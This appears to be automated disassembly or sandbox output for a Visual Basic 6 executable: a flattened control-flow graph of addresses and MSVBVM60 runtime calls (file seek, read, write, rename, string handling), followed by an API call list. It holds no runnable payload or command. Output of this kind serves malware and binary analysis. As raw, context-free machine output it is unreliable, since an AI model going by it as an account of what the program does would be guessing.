5102 413440 5081->5102 5082->5060 5084 413e33 5082->5084 5085 413e3b _adj_fdiv_m64 5082->5085 5083 41350a 5083->5060 5086 413516 __vbaI2I4 5083->5086 5088 414d85 5084->5088 5089 413e6b __vbaLenBstr 5084->5089 5085->5084 5148 413528 5086->5148 5087->5060 5087->5078 5087->5080 5090 413200 __vbaHresultCheckObj 5087->5090 5120 413344 13 API calls 5087->5120 5121 4132a8 13 API calls 5087->5121 5302 414d90 5087->5302 5088->5060 5089->5088 5093 413ea0 7 API calls 5089->5093 5090->5087 5091 413c14 5091->5060 5096 413c2a __vbaI2I4 5091->5096 5092 4134bf __vbaGenerateBoundsError 5099 4134c8 __vbaStrCopy 5092->5099 5097 4144f0 5093->5097 5098 413ee8 117 API calls 5093->5098 5095 413548 __vbaI2I4 5095->5148 5128 413c38 5096->5128 5097->5047 5105 4144fa 113 API calls 5097->5105 5104 414acf 9 API calls 5098->5104 5099->5060 5099->5102 5101 414d90 5 API calls 5106 41324c __vbaI2I4 5101->5106 5102->5060 5102->5083 5102->5092 5102->5099 5103 413487 __vbaGenerateBoundsError 5102->5103 5107 41349f __vbaGenerateBoundsError 5102->5107 5103->5102 5104->5049 5105->5104 5108 414d90 5 API calls 5106->5108 5107->5102 5109 41326a __vbaI2I4 5108->5109 5109->5087 5110 4135c0 __vbaHresultCheckObj 5110->5148 5111 413cad __vbaGenerateBoundsError 5112 413cb6 __vbaStrCmp 5111->5112 5112->5128 5113 413977 __vbaGenerateBoundsError 5122 413982 __vbaStrCmp 5113->5122 5114 413687 __vbaGenerateBoundsError 5119 413692 __vbaStrCmp 5114->5119 5115 413c79 __vbaGenerateBoundsError 5115->5128 5116 413c91 __vbaGenerateBoundsError 5116->5128 5117 413d3e #537 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStr 5117->5060 5117->5128 5118 413d29 __vbaGenerateBoundsError 5118->5128 5119->5148 5120->5087 5121->5087 5122->5148 5123 413610 __vbaGenerateBoundsError 5123->5148 5124 413900 __vbaGenerateBoundsError 5124->5148 5125 413639 _adj_fdiv_m64 5125->5148 5126 413929 _adj_fdiv_m64 5126->5148 5127 413cf5 __vbaGenerateBoundsError 5127->5128 5128->5060 5128->5079 5128->5111 5128->5112 5128->5115 5128->5116 5128->5117 
5128->5118 5128->5127 5135 413d0d __vbaGenerateBoundsError 5128->5135 5313 414e80 __vbaStrCopy __vbaAryConstruct2 __vbaStrCmp 5128->5313 5129 4137f9 __vbaGenerateBoundsError 5129->5148 5130 413ae9 __vbaGenerateBoundsError 5130->5148 5131 413748 __vbaGenerateBoundsError 5134 41374d __vbaStrCopy 5131->5134 5132 413a38 __vbaGenerateBoundsError 5136 413a3d __vbaStrCopy 5132->5136 5134->5148 5135->5128 5136->5148 5137 4138b8 __vbaGenerateBoundsError 5151 413bb0 __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStr 5137->5151 5138 413654 __vbaR8IntI4 5138->5148 5149 413667 __vbaGenerateBoundsError 5138->5149 5139 413b93 __vbaGenerateBoundsError 5139->5148 5140 413944 __vbaR8IntI4 5145 413957 __vbaGenerateBoundsError 5140->5145 5140->5148 5141 413786 __vbaGenerateBoundsError 5141->5148 5142 413a76 __vbaGenerateBoundsError 5142->5148 5143 4136d5 __vbaGenerateBoundsError 5143->5148 5144 4139c5 __vbaGenerateBoundsError 5144->5148 5145->5148 5146 4137ab _adj_fdiv_m64 5146->5148 5147 4139ea _adj_fdiv_m64 5147->5148 5148->5060 5148->5088 5148->5091 5148->5095 5148->5110 5148->5113 5148->5114 5148->5119 5148->5122 5148->5123 5148->5124 5148->5125 5148->5126 5148->5129 5148->5130 5148->5131 5148->5132 5148->5134 5148->5136 5148->5137 5148->5138 5148->5139 5148->5140 5148->5141 5148->5142 5148->5143 5148->5144 5148->5146 5148->5147 5150 413a9b _adj_fdiv_m64 5148->5150 5148->5151 5152 4136fa _adj_fdiv_m64 5148->5152 5153 413b1a __vbaGenerateBoundsError 5148->5153 5154 41382a __vbaGenerateBoundsError 5148->5154 5155 413ab6 __vbaR8IntI4 5148->5155 5156 413715 __vbaR8IntI4 5148->5156 5157 413b43 _adj_fdiv_m64 5148->5157 5158 4137c6 __vbaR8IntI4 5148->5158 5159 413a05 __vbaR8IntI4 5148->5159 5160 413853 _adj_fdiv_m64 5148->5160 5165 413b5e __vbaR8IntI4 5148->5165 5166 41386e __vbaR8IntI4 5148->5166 5149->5148 5150->5148 5151->5060 5151->5148 5152->5148 5153->5148 5154->5148 5155->5148 5161 413ac9 __vbaGenerateBoundsError 5155->5161 5156->5148 5162 413728 __vbaGenerateBoundsError 
5156->5162 5157->5148 5158->5148 5163 4137d9 __vbaGenerateBoundsError 5158->5163 5159->5148 5164 413a18 __vbaGenerateBoundsError 5159->5164 5160->5148 5161->5148 5162->5148 5163->5148 5164->5148 5165->5148 5167 413b75 __vbaGenerateBoundsError 5165->5167 5166->5148 5168 413885 __vbaGenerateBoundsError 5166->5168 5167->5148 5168->5148 5365 4066f4 5169->5365 5247 412c00 __vbaErrorOverflow 5246->5247 5248 41298c 5246->5248 5248->5247 5249 412b90 __vbaI2I4 __vbaFileClose 5248->5249 5250 4129a9 __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 5248->5250 5251 412bd7 __vbaFreeStr __vbaFreeStr 5249->5251 5250->5247 5252 4129f4 __vbaLenBstr 5250->5252 5251->4982 5252->5247 5253 412a07 5252->5253 5253->5249 5254 412a1b 7 API calls 5253->5254 5255 40ee70 24 API calls 5254->5255 5256 412a87 __vbaStrMove __vbaStrCopy __vbaStrMove #616 __vbaStrMove 5255->5256 5257 40ee70 24 API calls 5256->5257 5258 412add __vbaStrMove __vbaStrCmp __vbaFreeStrList 5257->5258 5258->5249 5259 412b21 5258->5259 5260 40ee70 24 API calls 5259->5260 5261 412b31 6 API calls 5260->5261 5261->5249 5263 40fba0 30 API calls 5262->5263 5264 411d9a __vbaFreeStr __vbaStrCat __vbaStrMove 5263->5264 5265 415660 145 API calls 5264->5265 5266 411dd0 __vbaFreeStr 5265->5266 5267 411df2 __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 5266->5267 5268 411ded __vbaFreeStr __vbaFreeStr 5266->5268 5269 40fba0 30 API calls 5267->5269 5268->4982 5270 411e43 5269->5270 5272 411e53 __vbaNew2 5270->5272 5273 411e6f __vbaObjSet __vbaObjSet 5270->5273 5272->5273 5275 412c10 452 API calls 5273->5275 5276 411ed4 __vbaFreeObjList #598 5275->5276 5277 411f04 5276->5277 5278 411f16 __vbaStrCat __vbaStrMove 5276->5278 5280 411f10 __vbaSetSystemError 5277->5280 5279 415d30 404 API calls 5278->5279 5281 411f43 12 API calls 5279->5281 5280->5278 5282 411ff0 8 API calls 5281->5282 5283 4123ba __vbaErrorOverflow 5281->5283 5282->5283 5284 412073 5282->5284 5284->5283 5285 412090 __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 5284->5285 5286 
4122d3 __vbaI2I4 __vbaFileClose __vbaI2I4 __vbaFileClose 5284->5286 5285->5283 5287 4120db 5285->5287 5288 40fba0 30 API calls 5286->5288 5287->5286 5289 4120ef __vbaI2I4 __vbaFileSeek #525 __vbaStrMove 5287->5289 5290 412311 __vbaStrCat __vbaStrMove __vbaNameFile __vbaFreeStr #580 5288->5290 5296 412142 5289->5296 5290->5268 5291 41224c __vbaI2I4 __vbaPut3 __vbaStrCopy 5292 40ee70 24 API calls 5291->5292 5293 412287 __vbaStrMove 5292->5293 5295 40eab0 29 API calls 5293->5295 5294 412170 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 5294->5283 5294->5296 5297 41229b __vbaStrMove __vbaI2I4 __vbaPut3 __vbaFreeStrList 5295->5297 5296->5283 5296->5291 5296->5294 5298 41223a #598 5296->5298 5299 4121e1 6 API calls 5296->5299 5297->5286 5298->5296 5299->5298 5301 405d59 5300->5301 5303 414dc2 _adj_fdiv_m64 5302->5303 5304 414dba 5302->5304 5303->5304 5305 414de2 __vbaR8IntI4 5304->5305 5306 414e40 5304->5306 5307 414df6 5305->5307 5308 414e6e __vbaErrorOverflow 5305->5308 5306->5308 5312 413228 __vbaI2I4 5306->5312 5307->5308 5309 414e13 5307->5309 5310 414e1b _adj_fdiv_m64 5307->5310 5309->5306 5311 414e32 __vbaR8IntI4 5309->5311 5310->5309 5311->5306 5311->5308 5312->5101 5314 4155f6 __vbaFreeStr __vbaFreeStr __vbaAryDestruct 5313->5314 5318 414ef4 5313->5318 5314->5117 5316 415650 __vbaErrorOverflow 5317 414f24 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5317->5318 5318->5316 5318->5317 5320 414f77 5318->5320 5321 414f5f __vbaI2I4 5318->5321 5319 41564b 5319->5316 5320->5316 5320->5319 5323 414fcf #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5320->5323 5325 415029 5320->5325 5321->5318 5322 4150de 5322->5316 5322->5319 5328 415190 5322->5328 5329 415136 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5322->5329 5323->5320 5324 415004 __vbaI2I4 5323->5324 5324->5320 5325->5316 5325->5319 5325->5322 5326 415084 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5325->5326 5326->5325 5327 4150b9 __vbaI2I4 5326->5327 5327->5325 5328->5316 5328->5319 5331 415245 5328->5331 5332 4151eb #631 
__vbaStrMove __vbaFreeVar __vbaStrCmp 5328->5332 5329->5322 5330 41516b __vbaI2I4 5329->5330 5330->5322 5331->5316 5331->5319 5334 4152fa 5331->5334 5336 4152a0 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5331->5336 5332->5328 5333 415220 __vbaI2I4 5332->5333 5333->5328 5334->5316 5334->5319 5337 4153ac 5334->5337 5339 415352 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5334->5339 5335 415461 5335->5319 5340 415495 5335->5340 5341 41549d _adj_fdiv_m32 5335->5341 5336->5331 5338 4152d5 __vbaI2I4 5336->5338 5337->5316 5337->5319 5337->5335 5343 415407 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5337->5343 5338->5331 5339->5334 5342 415387 __vbaI2I4 5339->5342 5340->5319 5344 4154b2 __vbaFpI2 5340->5344 5341->5340 5342->5334 5343->5337 5345 41543c __vbaI2I4 5343->5345 5346 4154c5 5344->5346 5347 4154cd _adj_fdiv_m32 5344->5347 5345->5337 5346->5319 5348 4154e2 __vbaFpI2 5346->5348 5347->5346 5349 4154f5 5348->5349 5350 4154fd _adj_fdiv_m32 5348->5350 5349->5319 5351 415512 __vbaFpI2 5349->5351 5350->5349 5352 415526 5351->5352 5353 41552e _adj_fdiv_m32 5351->5353 5352->5319 5354 415543 __vbaFpI2 5352->5354 5353->5352 5355 415557 5354->5355 5356 41555f _adj_fdiv_m32 5354->5356 5355->5319 5357 415574 __vbaFpI2 5355->5357 5356->5355 5358 415590 _adj_fdiv_m32 5357->5358 5359 415588 5357->5359 5358->5359 5359->5319 5360 4155a5 __vbaFpI2 5359->5360 5361 4155c1 _adj_fdiv_m32 5360->5361 5362 4155b9 5360->5362 5361->5362 5362->5319 5363 4155d2 __vbaFpI2 5362->5363 5363->5316 5364 4155d9 5363->5364 5364->5314 5364->5316 5366 4066fd 5365->5366 5367 40f149 5368 40f158 __vbaFreeStr __vbaFreeVar 5367->5368 5369 40f14f __vbaFreeStr 5367->5369 5369->5368 5373 40a24c 5374 40abac __vbaErrorOverflow 5373->5374 5375 40a25d 5373->5375 5376 40abc0 __vbaChkstk 5374->5376 5377 40a272 __vbaStrCat __vbaStrMove 5375->5377 5378 40aa5b 5375->5378 5379 40ac15 __vbaOnError 5376->5379 5380 40f8f0 4 API calls 5377->5380 5381 40f1d0 120 API calls 5378->5381 5382 418c90 20 API calls 5379->5382 5383 40a2a0 
__vbaFreeStr 5380->5383 5384 40aa6c 5381->5384 5385 40ac50 5382->5385 5386 40a329 __vbaStrCat __vbaStrMove 5383->5386 5387 40a2bb 7 API calls 5383->5387 5388 40aa7f __vbaObjSet 5384->5388 5438 40f1a0 __vbaStrCopy __vbaStrCopy 5384->5438 5389 418c90 20 API calls 5385->5389 5390 40f8f0 4 API calls 5386->5390 5387->5386 5396 40aaba 5388->5396 5397 40ac75 5389->5397 5393 40a357 __vbaFreeStr 5390->5393 5394 40a3e0 __vbaStrCat __vbaStrMove 5393->5394 5395 40a372 7 API calls 5393->5395 5398 40f8f0 4 API calls 5394->5398 5395->5394 5399 40aacb __vbaHresultCheckObj 5396->5399 5400 40aaee 5396->5400 5401 40a40e __vbaFreeStr 5398->5401 5402 40aaf8 __vbaFreeObj 5399->5402 5400->5402 5403 40a497 __vbaStrCat __vbaStrMove 5401->5403 5404 40a429 7 API calls 5401->5404 5406 40ab6f __vbaFreeStr __vbaFreeStr 5402->5406 5405 40f8f0 4 API calls 5403->5405 5404->5403 5407 40a4c5 __vbaFreeStr 5405->5407 5408 40a4e0 7 API calls 5407->5408 5409 40a54e __vbaStrCat __vbaStrMove 5407->5409 5408->5409 5410 40f8f0 4 API calls 5409->5410 5411 40a57c __vbaFreeStr 5410->5411 5412 40a605 __vbaStrCat __vbaStrMove 5411->5412 5413 40a597 7 API calls 5411->5413 5414 40f8f0 4 API calls 5412->5414 5413->5412 5415 40a633 __vbaFreeStr 5414->5415 5416 40a6bc __vbaStrCat __vbaStrMove 5415->5416 5417 40a64e 7 API calls 5415->5417 5418 40f8f0 4 API calls 5416->5418 5417->5416 5419 40a6ea __vbaFreeStr 5418->5419 5420 40a773 __vbaStrCat __vbaStrMove 5419->5420 5421 40a705 7 API calls 5419->5421 5422 40f8f0 4 API calls 5420->5422 5421->5420 5423 40a7a1 __vbaFreeStr 5422->5423 5424 40a82a __vbaStrCat __vbaStrMove 5423->5424 5425 40a7bc 7 API calls 5423->5425 5426 40f8f0 4 API calls 5424->5426 5425->5424 5427 40a858 __vbaFreeStr 5426->5427 5428 40a8e1 __vbaStrCat __vbaStrMove 5427->5428 5429 40a873 7 API calls 5427->5429 5430 40f8f0 4 API calls 5428->5430 5429->5428 5431 40a90f __vbaFreeStr 5430->5431 5432 40a998 __vbaStrCat __vbaStrMove 5431->5432 5433 40a92a 7 API calls 5431->5433 5434 40f8f0 4 API calls 
5432->5434 5433->5432 5435 40a9c6 __vbaFreeStr 5434->5435 5436 40a9e1 7 API calls 5435->5436 5437 40aa4f 5435->5437 5436->5437 5438->5388 4126 407a50 __vbaChkstk 4127 407aa5 4126->4127 4128 407ad8 4127->4128 4129 407abc __vbaNew2 4127->4129 4130 407b17 __vbaHresultCheckObj 4128->4130 4131 407b3a 4128->4131 4129->4128 4130->4131 4132 407b77 __vbaHresultCheckObj 4131->4132 4133 407b9a 4131->4133 4134 407ba4 __vbaFreeObj 4132->4134 4133->4134 4135 407bd3 4134->4135 4136 407bc6 __vbaEnd 4134->4136 4137 407be3 __vbaNew2 4135->4137 4138 407bff 4135->4138 4136->4135 4137->4138 4139 407c61 4138->4139 4140 407c3e __vbaHresultCheckObj 4138->4140 4141 407c99 __vbaHresultCheckObj 4139->4141 4142 407cbc 4139->4142 4140->4139 4143 407cc6 __vbaFreeObj 4141->4143 4142->4143 4144 407ce7 4143->4144 4145 407cf8 __vbaHresultCheckObj 4144->4145 4146 407d1b 4144->4146 4145->4146 4147 407d51 4146->4147 4148 407d35 __vbaNew2 4146->4148 4149 407d90 __vbaHresultCheckObj 4147->4149 4150 407db3 4147->4150 4148->4147 4149->4150 4151 407e10 4150->4151 4152 407ded __vbaHresultCheckObj 4150->4152 4153 407e1a #618 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeObj 4151->4153 4152->4153 4154 407e76 4153->4154 4155 407f98 4153->4155 4156 407ea2 4154->4156 4157 407e86 __vbaNew2 4154->4157 4158 407fc4 4155->4158 4159 407fa8 __vbaNew2 4155->4159 4162 407ee1 __vbaHresultCheckObj 4156->4162 4163 407f04 4156->4163 4157->4156 4160 408003 __vbaHresultCheckObj 4158->4160 4161 408026 4158->4161 4159->4158 4160->4161 4164 408060 __vbaHresultCheckObj 4161->4164 4165 408083 4161->4165 4162->4163 4166 407f61 4163->4166 4167 407f3e __vbaHresultCheckObj 4163->4167 4168 40808d __vbaStrCat __vbaStrMove __vbaFreeStr __vbaFreeObj 4164->4168 4165->4168 4169 407f6b __vbaStrMove __vbaFreeObj 4166->4169 4167->4169 4170 4080b9 __vbaStrCopy 4168->4170 4169->4170 4242 40ee70 __vbaLenBstr 4170->4242 4172 4080d7 __vbaStrMove __vbaStrCopy __vbaFreeStrList 4173 408112 __vbaNew2 4172->4173 4174 40812e 4172->4174 4173->4174 
4175 408190 4174->4175 4176 40816d __vbaHresultCheckObj 4174->4176 4177 4081ca __vbaHresultCheckObj 4175->4177 4178 4081ed 4175->4178 4176->4175 4179 4081f7 12 API calls 4177->4179 4178->4179 4180 40ee70 24 API calls 4179->4180 4181 4082a5 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4180->4181 4182 40ee70 24 API calls 4181->4182 4183 4082ee __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4182->4183 4184 40ee70 24 API calls 4183->4184 4185 40833e 6 API calls 4184->4185 4186 40ee70 24 API calls 4185->4186 4187 4083a3 6 API calls 4186->4187 4188 40ee70 24 API calls 4187->4188 4189 408402 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4188->4189 4190 40ee70 24 API calls 4189->4190 4191 408452 6 API calls 4190->4191 4192 40ee70 24 API calls 4191->4192 4193 4084b8 6 API calls 4192->4193 4194 40ee70 24 API calls 4193->4194 4195 408517 14 API calls 4194->4195 4196 40ee70 24 API calls 4195->4196 4197 4085ef 14 API calls 4196->4197 4198 40ee70 24 API calls 4197->4198 4199 4086ce 6 API calls 4198->4199 4200 40ee70 24 API calls 4199->4200 4201 408734 8 API calls 4200->4201 4202 40ee70 24 API calls 4201->4202 4203 4087a9 __vbaStrMove __vbaStrCopy __vbaFreeStrList 4202->4203 4255 4125a0 10 API calls 4203->4255 4205 4087e7 7 API calls 4206 4088bb __vbaStrCmp 4205->4206 4207 40885f 4205->4207 4209 408979 __vbaStrCmp 4206->4209 4210 4088dc 4206->4210 4270 418c90 6 API calls 4207->4270 4211 408a32 __vbaStrCopy 4209->4211 4212 40899a 4209->4212 4214 4125a0 60 API calls 4210->4214 4215 40ee70 24 API calls 4211->4215 4216 4125a0 60 API calls 4212->4216 4218 4088ef 4214->4218 4219 408a56 6 API calls 4215->4219 4220 4089ad 4216->4220 4222 408937 #600 __vbaEnd 4218->4222 4278 40fba0 __vbaChkstk __vbaOnError 4218->4278 4224 40ee70 24 API calls 4219->4224 4225 4089f5 #600 __vbaEnd 4220->4225 4228 40fba0 30 API calls 4220->4228 4222->4211 4227 408abc 8 API calls 4224->4227 4225->4211 4230 40ee70 24 API calls 4227->4230 4231 4089c6 4228->4231 4233 408b31 
__vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4230->4233 4234 415660 145 API calls 4231->4234 4232 408921 #580 4232->4222 4235 40ee70 24 API calls 4233->4235 4236 4089df #580 4234->4236 4237 408b7a __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4235->4237 4236->4225 4238 40ee70 24 API calls 4237->4238 4239 408bc3 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4238->4239 4240 40ee70 24 API calls 4239->4240 4241 408c0c __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4240->4241 4254 40eece 4242->4254 4243 40f136 __vbaStrCopy 4244 40f142 __vbaFreeStr 4243->4244 4244->4172 4245 40eef6 #631 __vbaStrMove #516 4246 40f18b __vbaErrorOverflow 4245->4246 4245->4254 4248 40ef68 __vbaFreeStr __vbaFreeVar 4248->4246 4248->4254 4249 40ef98 #631 __vbaStrMove #516 4249->4246 4249->4254 4250 40f00f __vbaFreeStr __vbaFreeVar 4250->4246 4250->4254 4251 40f040 #631 __vbaStrMove #516 4251->4246 4251->4254 4252 40f0af __vbaFreeStr __vbaFreeVar 4252->4246 4252->4254 4253 40f0ee #537 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStr 4253->4246 4253->4254 4254->4243 4254->4244 4254->4245 4254->4246 4254->4248 4254->4249 4254->4250 4254->4251 4254->4252 4254->4253 4256 41267c 4255->4256 4257 41289e __vbaErrorOverflow 4255->4257 4256->4257 4258 412685 4256->4258 4259 412699 7 API calls 4258->4259 4266 412810 __vbaI2I4 __vbaFileClose 4258->4266 4261 40ee70 24 API calls 4259->4261 4263 412705 __vbaStrMove __vbaStrCopy __vbaStrMove #616 __vbaStrMove 4261->4263 4262 412875 __vbaFreeStr __vbaFreeStr 4262->4205 4264 40ee70 24 API calls 4263->4264 4265 41275b __vbaStrMove __vbaStrCmp __vbaFreeStrList 4264->4265 4265->4266 4267 41279f 4265->4267 4266->4262 4268 40ee70 24 API calls 4267->4268 4269 4127af 6 API calls 4268->4269 4269->4266 4332 405dd8 4270->4332 4334 40f8f0 __vbaStrToAnsi 4278->4334 4281 40fc43 4338 40f9a0 __vbaStrToAnsi 4281->4338 4282 40fc0b #580 #529 4283 408908 4282->4283 4287 415660 10 API calls 4283->4287 4286 40fc5e 18 API calls 4286->4283 
4288 415742 4287->4288 4289 415d28 __vbaErrorOverflow 4287->4289 4288->4289 4290 41574b __vbaStrCopy 4288->4290 4291 40ee70 24 API calls 4290->4291 4292 41575e __vbaStrMove __vbaFreeStr 4291->4292 4293 4158e3 __vbaStrCat __vbaStrMove 4292->4293 4294 41577d __vbaLenBstr #525 __vbaStrMove __vbaI2I4 __vbaGet4 4292->4294 4295 4158fd 4293->4295 4296 40ee70 24 API calls 4294->4296 4297 40eab0 29 API calls 4295->4297 4298 4157b2 6 API calls 4296->4298 4299 415902 __vbaStrMove __vbaFreeStr 4297->4299 4300 4158c7 __vbaStrCat __vbaStrMove 4298->4300 4301 415816 4298->4301 4302 415912 8 API calls 4299->4302 4300->4295 4303 40ee70 24 API calls 4301->4303 4309 41597d 4302->4309 4304 41581f 6 API calls 4303->4304 4344 40eab0 #594 __vbaFreeVar __vbaLenBstr 4304->4344 4305 415a25 #594 __vbaFreeVar __vbaRedim 4315 415a67 4305->4315 4307 415860 __vbaStrMove __vbaFreeStrList 4307->4289 4310 41588b __vbaI2I4 __vbaGet4 4307->4310 4308 4159a0 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 4308->4289 4308->4309 4309->4289 4309->4305 4309->4308 4314 4159e8 6 API calls 4309->4314 4320 4158a5 4310->4320 4311 415b11 4316 415b1f __vbaSetSystemError 4311->4316 4321 415b25 4311->4321 4312 415a74 #593 4313 415abd __vbaGenerateBoundsError 4312->4313 4312->4315 4313->4315 4314->4309 4315->4311 4315->4312 4315->4313 4317 415aaf __vbaGenerateBoundsError 4315->4317 4318 415d23 4315->4318 4319 415adf __vbaFpUI1 __vbaFreeVar 4315->4319 4316->4321 4317->4315 4318->4289 4319->4289 4319->4315 4320->4289 4320->4302 4321->4289 4322 415b92 4321->4322 4323 415b6b __vbaI2I4 __vbaPutOwner3 4321->4323 4322->4289 4324 415b9e #593 4322->4324 4323->4289 4323->4321 4324->4318 4325 415bd5 __vbaFpI4 __vbaFreeVar 4324->4325 4326 415bfa __vbaRedimPreserve __vbaI2I4 __vbaPutOwner3 4325->4326 4327 415bef 4325->4327 4326->4289 4328 415c34 4326->4328 4329 415bf4 __vbaSetSystemError 4327->4329 4328->4289 4330 415c3d 9 API calls 4328->4330 4329->4326 4331 415ce0 6 API calls 4330->4331 4331->4232 4333 405de1 4332->4333 4342 405768 
4334->4342 4336 40f937 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 4337 40f958 4336->4337 4337->4281 4337->4282 4339 405768 4338->4339 4340 40f9e7 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 4339->4340 4341 40fa08 4340->4341 4341->4283 4341->4286 4343 405771 4342->4343 4350 40eb43 4344->4350 4345 40ede6 __vbaStrCopy 4347 40ee44 __vbaFreeStr 4345->4347 4346 40eb4f #631 __vbaStrMove #516 __vbaFreeStr __vbaFreeVar 4348 40ee69 __vbaErrorOverflow 4346->4348 4346->4350 4347->4307 4349 40ec68 #593 4349->4348 4349->4350 4350->4345 4350->4346 4350->4348 4350->4349 4351 40ee64 4350->4351 4352 40ecf9 17 API calls 4350->4352 4351->4348 4352->4348 4352->4350 5441 404850 5442 40d750 __vbaChkstk 5441->5442 5443 40d7a5 __vbaOnError 5442->5443 5444 40f9a0 4 API calls 5443->5444 5445 40d7cb 5444->5445 5446 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 5445->5446 5447 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 5445->5447 5448 40d841 __vbaStrCat __vbaStrMove 5446->5448 5449 40d82a __vbaStrCopy 5446->5449 5451 40d864 __vbaInStr __vbaInStr 5448->5451 5449->5451 5452 40e11d #598 5451->5452 5453 40d8ad 5451->5453 5452->5447 5454 40d8cf 6 API calls 5453->5454 5456 40d8c9 __vbaSetSystemError 5453->5456 5455 404c70 5454->5455 5457 40d93d __vbaSetSystemError __vbaRecAnsiToUni __vbaFreeStrList 5455->5457 5456->5454 5457->5452 5458 40d99c __vbaStrFixstr __vbaStrMove 5457->5458 5459 40ff70 14 API calls 5458->5459 5460 40d9c9 7 API calls 5459->5460 5461 40e1d1 __vbaErrorOverflow 5460->5461 5462 40da8b 7 API calls 5460->5462 5475 40e1e0 5461->5475 5463 40df09 6 API calls 5462->5463 5482 40daf3 5462->5482 5464 40df88 __vbaChkstk #689 __vbaStrMove __vbaStrCmp __vbaFreeStr 5463->5464 5465 40e09e #598 __vbaRecUniToAnsi 5463->5465 5464->5465 5467 40e028 5464->5467 5465->5482 5466 40f8f0 4 API calls 5466->5482 5468 40e04a #580 __vbaStrToAnsi 5467->5468 5472 40e044 __vbaSetSystemError 5467->5472 5474 40e07b __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 
5467->5474 5468->5467 5469 40e0d5 __vbaSetSystemError __vbaRecAnsiToUni 5469->5458 5471 40e107 5469->5471 5470 4123c0 47 API calls 5473 40db1e __vbaStrMove __vbaStrCopy #616 __vbaStrMove 5470->5473 5477 40e117 __vbaSetSystemError 5471->5477 5472->5468 5476 40ee70 24 API calls 5473->5476 5474->5465 5478 40db68 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5476->5478 5477->5452 5479 40dbbb __vbaStrCopy 5478->5479 5478->5482 5480 40ee70 24 API calls 5479->5480 5481 40dbe3 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5480->5481 5481->5482 5483 40dc2f __vbaStrCat __vbaStrMove 5481->5483 5482->5465 5482->5466 5482->5469 5482->5470 5485 4128b0 65 API calls 5482->5485 5488 411d10 1112 API calls 5482->5488 5484 40fba0 30 API calls 5483->5484 5486 40dc5f __vbaFreeStr __vbaStrCat __vbaStrMove 5484->5486 5485->5482 5487 415660 145 API calls 5486->5487 5489 40dc9b __vbaFreeStr 5487->5489 5488->5482 5489->5482 5490 40dcbd __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 5489->5490 5491 40fba0 30 API calls 5490->5491 5492 40dd14 5491->5492 5493 40dd24 __vbaNew2 5492->5493 5494 40dd63 __vbaObjSet __vbaObjSet 5492->5494 5493->5492 5495 412c10 452 API calls 5494->5495 5496 40ddb4 __vbaFreeObjList #598 __vbaStrCat __vbaStrMove 5495->5496 5497 415d30 404 API calls 5496->5497 5498 40de0a __vbaFreeStr #598 __vbaStrCat __vbaStrMove 5497->5498 5499 4111a0 122 API calls 5498->5499 5500 40de51 __vbaFreeStr 5499->5500 5500->5482 5501 40de6f #598 5500->5501 5502 40fba0 30 API calls 5501->5502 5503 40de8c __vbaStrCat __vbaStrMove __vbaNameFile __vbaFreeStr #580 5502->5503 5503->5482 5504 408c50 5505 40ee70 24 API calls 5504->5505 5506 408c55 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5505->5506 5507 40ee70 24 API calls 5506->5507 5508 408c9e __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5507->5508 5509 40ee70 24 API calls 5508->5509 5510 408ce7 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5509->5510 5511 40ee70 24 API calls 5510->5511 5512 408d30 __vbaStrMove 

Control-flow Graph

APIs
• __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
• __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
• __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
• __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
• __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
• __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
• __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
• __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
• #525.MSVBVM60(00000104), ref: 0041029C
• __vbaStrMove.MSVBVM60 ref: 004102A7
• __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
• __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
• __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
• __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
• __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
